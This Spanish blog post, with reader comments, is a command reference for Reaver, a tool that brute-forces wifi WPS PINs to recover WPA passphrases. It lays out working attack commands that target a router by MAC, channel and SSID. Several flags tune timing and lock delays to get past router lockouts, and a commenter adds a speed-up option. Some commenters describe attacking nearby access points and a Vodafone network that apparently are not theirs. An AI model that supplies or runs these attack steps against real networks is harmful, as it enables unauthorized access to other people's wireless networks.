Listado de comandos Reaver

 

Hoy vamos a ver un listado de comandos para que hagáis pruebas con Reaver, por supuesto, estos comandos son válidos para cualquier distribución linux para auditorías linux (backtrack, wifiway, wifislax…), para conseguir el tan preciado wps pin y WPA Passphrase.

wps pin

wps pin

Bueno manos a la obra, para comenzar abrimos shell, ponemos nuestra tarjeta en modo monitor y escribimos:

airmon-ng start wifi0

Y ahora vamos con los comandos Reaver, empezamos con el básico para hacerlo funcionar:

reaver -i mon0 -b XX:XX:XX:XX:XX

Donde -i es la tarjeta que hemos puesto en modo monitor, puede ser 0,1,2.  

      -b es la MAC del router que vamos a probar.

 

Con este comando le damos más datos a Reaver sobre la red que vamos a atacar.

reaver -i mon0 -b XX:XX:XX:XX:XX -c 11 -e beatles

Donde -c es el canal por donde emite el router que vamos a atacar.

      -e es el SSID ó nombre de la red, en este caso he puesto beatles porque es mi red.

 

Con este comando haremos que Reaver cambie de canal, si el Router lo hace:

reaver -i mon0 -b XX:XX:XX:XX:XX --fixed

 

En Reaver prueba los comandos durante 5 segundos por defecto, con esto podemos configurarlo nosotros:

reaver -i mon0 -b XX:XX:XX:XX:XX -t 1

Donde -t es el tiempo en segundo, y el mínimo es 1.

 

Tiempo de retrasos entre PIN

reaver -i mon0 -b XX:XX:XX:XX:XX -d 0

Donde -d es el tiempo en segundos se puede utilizar con signo negativo.

 

Mediante este comando le decimos a Reaver que compruebe cada cierto tiempo si el router se ha desbloqueado. Determinados router cuando detectan movimientos extraños (varios intentos de pin) se bloquean durante un periodo de tiempo.

reaver -i mon0 -b XX:XX:XX:XX:XX –lock-delay=315

 

Vamos con uno que yo siempre utilizo, es para que Reaver nos describa el proceso que va realizando, es decir, que nos diga los pins que está probando.

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv

 

Ahora vamos con el último. Determinados router cuando detectan 10 intentos de pin inválidos, se bloquean, con este comando conseguiremos que cuando lleve varios pare y luego vuelva a arrancar.

reaver -i mon0 -b XX:XX:XX:XX:XX:XX --fail-wait=360

 

Bueno pues aquí tenéis los comandos básicos de Reaver, os recomiendo que los probéis, y por supuesto, si conocéis alguno más os agradecería que me lo indicaseis en los comentarios.  

25 Comentarios

  • Hola,ante todo agradezco la gran ayuda que nos estas proporcionando,ayer puse el backtrack,con la gran satisfaccion que arranca estupendamente,simplemente con poner startx y darle al enter,el problema es que el teclado esta en ingles,¿conoces de algun tutorial que me pueda enseñar como ponerlo en español’?,muchisimas gracias de antemano

    • Gracias a todos vosotros. Voy a buscar a ver si veo algo, pero la verdad es que no lo sé.

  • es mas eficas hacerlo desde las aplicaciones k ya vienen instaladas o con los comandos??? gracias

    • Pues la verdad es que no sabría decirte, ciertas aplicaciones dan fallos, que con los comandos no los dan, y el ejemplo lo tienes en Reaver e inflator, que a veces hace cosas un poco raras. Cuando tengo prisa, aplicación, cuando puedo recrearme, me gustan los comandos.

  • Para el del “teclado” en ingles… tienes que buscar sistema>Preferencias>Teclado ahi buscas es el español (si es el tuyo claro) pero elige el de eliminar las teclas muertas o mas facil desde la terminal: setxkbmap es Saludos.

    • Gracias por la información, me alegra mucho que los usuarios de la web interactúen.

  • Otra opción que puede acelerar un ataque es – dh-small. Esta opción se utiliza para utilizar pequeños números secretos Diffie-Hellman con el fin de reducir la carga computacional en el objetivo AP:

    # reaver -i mon0-b 00:01:02:03:04:05-vv – dh-small

    • Muchas gracias amigo, voy a probarlo y te cuento.

  • A ver, voy a probarlo, si resulta te enviaré miles de besos.

    • jajajaj, espero que te funcione, si necesitas algo, por aquí estamos.

  • Ola.Una pregunta, alguien sabe que diferencia hay entre reaver, reaver 1.3. y reaver wifislax??

    Gracias por adelantado.

    • Reaver es un programa dentro del sistema operativo wifislax, wifiway y backtrack, creo que a partir de la versión 3.

      Y la diferencia entre reaver y reaver 1.3, es que reaver 1.3 fué la primera versión de la distro, pero vamos que es lo mismo.

      Gracias a ti.

  • GRACIAS POR EL TUTORIAL

    • Gracias a ti amigo.

  • buenas tardes, yo no soy capaz de hacer funcionar backtrack 5 en windows 8, x muchos comandos que modifique al llegar a la pantalla donde aparece startx, ahi se pone la pantalla en negro y no soy capaz de seguir, gracias y un saludo a tod@s

    • perdon, soy nueva x aqui y ya me e dado cuenta que este comentario no debería haberlo hecho aquí, hay un tema especifico para ello

      • No te preocupes, no pasa nada, te lo agradezco, eso quiere decir que estás investigando en la web.

    • Hola amiga, no sé si es esto lo que te pasa, pero comprueba a ver si te sirve.

  • Hola el caso es que desde mi ubicacion tengo aproximado unos 12 AP con el WPS no locked.
    He probado Backtrack5R3,Kali Linux, Xiaopan,Airubuntu Codename Pegasus,wifislash,wifiway principalmente, lo que me sucede es que al lanzar reaver (normalmente lo hago asi):
    reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c x -vv. la gran mayoria de AP parecen tragar bien hasta el punto donde sale el porcentage que no se mueve, es mas ni debuta. se queda en 0,00%.
    La verdad me gustaria saber el porque unos 8 u 9 AP supuestamente vulnerables no inician el porcentage, si quizas hay algun comando para solucionarlo o si tal vez alguien me pudiese guiar un poco. Gracias :)

    • Generalmente cuando no arranca puede ser por dos motivos:
      1- Por qué no tienes suficiente señal.
      2- Por qué realmente no tenga el sistema wps activado.
      ¿Has probado inflator?. Inténtalo con el y me dices algo. Mucha suerte.

  • Hola, ante todo un saludo y gracias por tu respuesta, bueno lo de la señal descartado XD, Lo del WPS es posible, me guio de wash -i mon0 -C , y la verdad hasta ahora lo tenia como de lo mas eficaz… El inflator si lo he usado mas de una vez pero mas de lo mismo, de todos modos voy a buscar a ver si lo encuentro para kali linux y te comento.

    • Hola amigo, gracias a ti. En cuanto a lo del wash, hay una versión creo que es la 1.3 que contenía la primera versión de wifiway 3.4 que daba fallos, lo que a mi no me ha fallado nunca te lo puedo garantizar ha sido con un móvil android y el programa wlan audit, aquí tienes un artículo sobre él.
      Te agradecería mucho, si me dices algo de kali, yo me lo he descargado y estoy echándole un vistazo, es de los creadores de Backtrack lo cual es toda una garantía.

  • hey amigo quisiera saber las teclas q presentan alguna funcion en las consola por ejemplo se q la tecla (space) pausa la toma de “beacons” y otras teclas mas pero quisoera saber mas de eso ya lo demas se saca con /help hahaha

    • Buena idea para un artículo, lo pondré en práctica, gracias amigo.

  • Hola,
    Estoy probando con una vodafoneXXXX y reaver me lanza el mensaje:

    Sending M2 message
    Last message not processed properly, reveting state to previous message
    Out of order packet received, re-trasmitting last message
    Sending M2D

    Y repite los mensajes. Mi pregunta es qué significa el mensaje M2D y por qué se produce este error. Cuando pruebo en otra red con el pin correcto va avanzando correctamente M2, M4, M6… Aquí me pasa con cualquier pin que pruebo (-p XXXXXXXX), aparte de probar con el correcto. Al final me dice:

    Key cracked in 15 seconds
    WPS pin: ’4011XXXX’ (el introducido en el comando)

    Y no me devuelve la clave WPA.

    Un saludo y gran web.

Comentar

Hoy día, es muy común que donde quiera que vayamos, veamos que estamos rodeados de señales wifi, Wifidel nace con la idea de aprender entre todos un poco más acerca de las redes wireless.

Tipos de seguridad que podemos utilizar en nuestras redes, equipos para realizar conexiones lejanas. Los métodos que existen para saltar esa seguridad, compañías que actualmente existen, así como productos que nos ofrecen. Descarga de software.

Navegando un poco por la red vemos que existen muchos foros que hablan acerca de este tema, pero donde toda la información se encuentra dispersa, la idea es que aquí todo este visible y accesible para cualquier persona interesada en este tema. Por supuesto todo lo que vosotros creáis interesante, para ello podéis utilizar los canales para interactuar como son los comentarios o bien mediante suscripción. Y así otras muchas cosas que ya os iré comentando y que pueden ser de mucha utilidad.
Translate »
English
English

Contador de visitas

Recibe suscripciones por email

Enter your email address:

Delivered by FeedBurner